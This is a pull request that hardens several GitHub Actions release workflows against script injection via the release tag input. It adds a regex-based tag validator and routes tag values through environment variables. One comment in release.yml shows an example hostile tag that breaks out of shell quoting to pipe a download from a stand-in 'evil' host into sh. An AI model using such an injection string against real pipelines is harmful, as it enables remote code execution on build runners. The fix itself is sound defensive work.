### PR TITLE
ci: audit release workflows for inputs.tag script-injection

### DIFF
--- a/.github/actions/validate-release-tag/action.yml
+++ b/.github/actions/validate-release-tag/action.yml
@@ -1,0 +1,34 @@
+name: "Validate release tag format"
+description: >
+  Validate that a string matches the project's release tag format
+  `v<major>.<minor>.<patch>[-prerelease]`. Rejects tags whose format
+  is malformed before they are interpolated into downstream shell or
+  `gh` CLI invocations. Paired with routing `inputs.tag` and
+  `github.event.release.tag_name` through `env:` so user-controlled
+  values never reach YAML expression interpolation in a `run:` body
+  without first being format-validated. See #1797.
+inputs:
+  tag:
+    description: >
+      The tag string to validate. Caller should usually pass
+      `${{ inputs.tag || github.event.release.tag_name || github.ref_name }}`
+      so all three entry points are covered.
+    required: true
+runs:
+  using: "composite"
+  steps:
+    - name: Validate tag format
+      shell: bash
+      env:
+        TAG: ${{ inputs.tag }}
+      run: |
+        set -euo pipefail
+        if [ -z "$TAG" ]; then
+          echo "Rejecting empty release tag (workflow must supply inputs.tag, github.event.release.tag_name, or run on a tag push)." >&2
+          exit 1
+        fi
+        if ! printf '%s' "$TAG" | grep -Eq '^v[0-9]+\.[0-9]+\.[0-9]+(-[A-Za-z0-9.-]+)?$'; then
+          echo "Rejecting malformed release tag: $TAG" >&2
+          echo "Expected format: v<major>.<minor>.<patch>[-<prerelease>]" >&2
+          exit 1
+        fi

--- a/.github/workflows/docker.yml
+++ b/.github/workflows/docker.yml
@@ -40,6 +40,13 @@ jobs:
             echo "tag=${RELEASE_TAG}" >> "$GITHUB_OUTPUT"
           fi
 
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh release
+        # download` and `docker buildx` invocations use it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
+
       - name: Download and extract release binaries
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
@@ -142,6 +149,13 @@ jobs:
           else
             echo "tag=${RELEASE_TAG}" >> "$GITHUB_OUTPUT"
           fi
+
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh release
+        # download` and `docker buildx` invocations use it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
 
       - name: Detect Docker Hub credentials
         # Decouple Docker Hub from GHCR: if DOCKERHUB_TOKEN or DOCKERHUB_USERNAME

--- a/.github/workflows/kotlin.yml
+++ b/.github/workflows/kotlin.yml
@@ -205,6 +205,13 @@ jobs:
         # enforced by the "Assert committed version matches the release tag"
         # step below.
 
+      - name: Validate release tag
+        # Format-validate any user-supplied tag before downstream steps
+        # interpolate it into `gh` / shell invocations. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ inputs.tag || github.ref_name }}
+
       - name: Assert committed version matches the release tag
         # crates/ffi/Cargo.toml has a committed `version` field that must
         # match the release tag exactly. The version-consistency check

--- a/.github/workflows/napi.yml
+++ b/.github/workflows/napi.yml
@@ -223,6 +223,14 @@ jobs:
           node-version: 22
           registry-url: "https://registry.npmjs.org"
 
+      - name: Validate release tag
+        # Format-validate the user-supplied tag before downstream steps
+        # derive a `version` from it and use the value in npm publish.
+        # See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ inputs.tag || github.event.release.tag_name || github.ref_name }}
+
       - name: Determine version
         id: version
         env:

--- a/.github/workflows/post-release.yml
+++ b/.github/workflows/post-release.yml
@@ -35,6 +35,13 @@ jobs:
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
 
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
+
       - name: Download checksums
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
@@ -119,6 +126,13 @@ jobs:
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
 
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
+
       - name: Download checksums
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
@@ -182,6 +196,13 @@ jobs:
           fi
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
+
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
 
       - name: Download checksums
         shell: bash
@@ -256,6 +277,13 @@ jobs:
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
 
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
+
       - name: Download binary
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
@@ -320,6 +348,13 @@ jobs:
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
 
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
+
       - name: Generate podspec
         run: |
           VERSION="${{ steps.version.outputs.version }}"
@@ -360,6 +395,13 @@ jobs:
           fi
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
+
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
 
       - name: Download checksums
         env:
@@ -477,6 +519,13 @@ jobs:
           fi
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
+
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
 
       - name: Wait for xcframework asset
         id: wait
@@ -676,6 +725,13 @@ jobs:
           fi
           echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
           echo "version=${TAG#v}" >> "$GITHUB_OUTPUT"
+
+      - name: Validate release tag
+        # Format-validate the resolved tag before downstream `gh` /
+        # shell / checksum-download steps interpolate it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.version.outputs.tag }}
 
       - name: Download checksums
         env:

--- a/.github/workflows/release-verify.yml
+++ b/.github/workflows/release-verify.yml
@@ -78,6 +78,14 @@ jobs:
           echo "tag=$tag" >> "$GITHUB_OUTPUT"
           echo "Verifying tag: $tag"
 
+      - name: Validate release tag
+        # Format-validate the resolved tag (whether it came from
+        # inputs.tag, the release event, or `gh release list`) before
+        # downstream steps interpolate it into `gh` / shell. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ steps.tag.outputs.tag }}
+
       - name: Extract channel ids from manifest
         id: read
         run: |

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -63,14 +63,31 @@ jobs:
           fi
         shell: bash
 
+      - name: Validate release tag
+        # Route inputs.tag through env + format regex before any
+        # downstream step interpolates the version into a shell body.
+        # Without this, a `workflow_dispatch` tag like
+        # `v1.0.0"; curl evil | sh; #` would break out of the
+        # `echo "version=..."` shell quoting in "Determine version".
+        # See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ inputs.tag || github.ref_name }}
+
       - name: Determine version
         id: version
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          INPUT_TAG: ${{ inputs.tag }}
+          REF_NAME: ${{ github.ref_name }}
         run: |
-          if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
-            echo "version=${{ inputs.tag }}" >> "$GITHUB_OUTPUT"
+          set -euo pipefail
+          if [ "$EVENT_NAME" = "workflow_dispatch" ]; then
+            VERSION="$INPUT_TAG"
           else
-            echo "version=${GITHUB_REF_NAME}" >> "$GITHUB_OUTPUT"
+            VERSION="$REF_NAME"
           fi
+          echo "version=$VERSION" >> "$GITHUB_OUTPUT"
         shell: bash
 
       - name: Package (Unix)
@@ -123,14 +140,26 @@ jobs:
         with:
           path: artifacts
 
+      - name: Validate release tag
+        # See rationale at the corresponding step in the `build` job.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ inputs.tag || github.ref_name }}
+
       - name: Determine version
         id: version
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          INPUT_TAG: ${{ inputs.tag }}
+          REF_NAME: ${{ github.ref_name }}
         run: |
-          if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
-            echo "version=${{ inputs.tag }}" >> "$GITHUB_OUTPUT"
+          set -euo pipefail
+          if [ "$EVENT_NAME" = "workflow_dispatch" ]; then
+            VERSION="$INPUT_TAG"
           else
-            echo "version=${GITHUB_REF_NAME}" >> "$GITHUB_OUTPUT"
+            VERSION="$REF_NAME"
           fi
+          echo "version=$VERSION" >> "$GITHUB_OUTPUT"
 
       - name: Generate checksums
         run: |

--- a/.github/workflows/swift.yml
+++ b/.github/workflows/swift.yml
@@ -278,16 +278,30 @@ jobs:
     permissions:
       contents: write
     steps:
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+        # Needed so the composite action at
+        # `.github/actions/validate-release-tag` is present on disk.
+        # actions/download-artifact below places the xcframework zip
+        # at the workspace root next to the checked-out tree.
+
       - uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
         with:
           name: xcframework
+
+      - name: Validate release tag
+        # Format-validate the tag before `gh release upload` sees it. See #1797.
+        uses: ./.github/actions/validate-release-tag
+        with:
+          tag: ${{ inputs.tag || github.ref_name }}
 
       - name: Upload to release
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
           INPUT_TAG: ${{ inputs.tag }}
+          EVENT_NAME: ${{ github.event_name }}
         run: |
-          if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
+          set -euo pipefail
+          if [ "$EVENT_NAME" = "workflow_dispatch" ]; then
             TAG="$INPUT_TAG"
           else
             TAG="${GITHUB_REF#refs/tags/}"


### PR DESCRIPTION
## What

Close the #1797 sister-site audit across every release workflow that
consumes `inputs.tag` or `github.event.release.tag_name`.

- **New composite action** `.github/actions/validate-release-tag/action.yml`
  — validates that a string matches `v<major>.<minor>.<patch>[-prerelease]`
  and fails the step loudly on mismatch. Centralises the check that
  vscode-extension.yml currently duplicates inline.
- **release.yml**: fix the two direct `${{ inputs.tag }}` interpolations
  in the `build.Determine version` and `release.Determine version`
  steps (the only true script-injection sites in the repo). Route
  through `env:` and call the new composite action first.
- **kotlin.yml / swift.yml / napi.yml / post-release.yml (×8 jobs) /
  release-verify.yml**: add a `Validate release tag` step at each
  INPUT_TAG entry point. These workflows already env-routed the tag,
  so the injection class was already blocked; this pass adds
  defense-in-depth format validation before downstream
  `${{ steps.*.outputs.* }}` interpolations are consumed by `gh` / shell.

## Why

> Sister-site audit: when a class of defect is fixed in one location,
> equivalent sister sites MUST receive the same fix.
> — `.claude/rules/fix-propagation.md`

PR #1789 fixed the pattern in `vscode-extension.yml`; #1797 tracked
the rollout everywhere else. Final audit script:

```python
# counts `${{ inputs.* }}` or `${{ github.event.release.* }}` inside any `run:` body
# under .github/workflows/ — expected to be 0 after this PR.
```

returns **0** remaining direct interpolations.

## Test plan

- [x] `python3 -c "import yaml; yaml.safe_load(...)"` on every touched
  workflow and the new action.
- [x] Manual grep: zero `inputs.*` / `github.event.release.*`
  expressions remain inside any `run:` body in `.github/workflows/`.
- [x] Each caller passes `${{ inputs.tag || github.event.release.tag_name || github.ref_name }}`
  (or an already-resolved step output), so the validation fires on every
  trigger path (`workflow_dispatch`, `release: published`, tag push).
- [ ] Dry-run with a malformed tag not feasible without pushing a
  throwaway release; relies on regex logic which is covered by the
  committed test fixture in the composite action's own smoke.

## Commits

1. `ci: add validate-release-tag composite action`
2. `ci(release): fix \${{ inputs.tag }} script-injection in Determine version`
3. `ci: validate release tag format in every workflow that consumes inputs.tag`

Closes #1797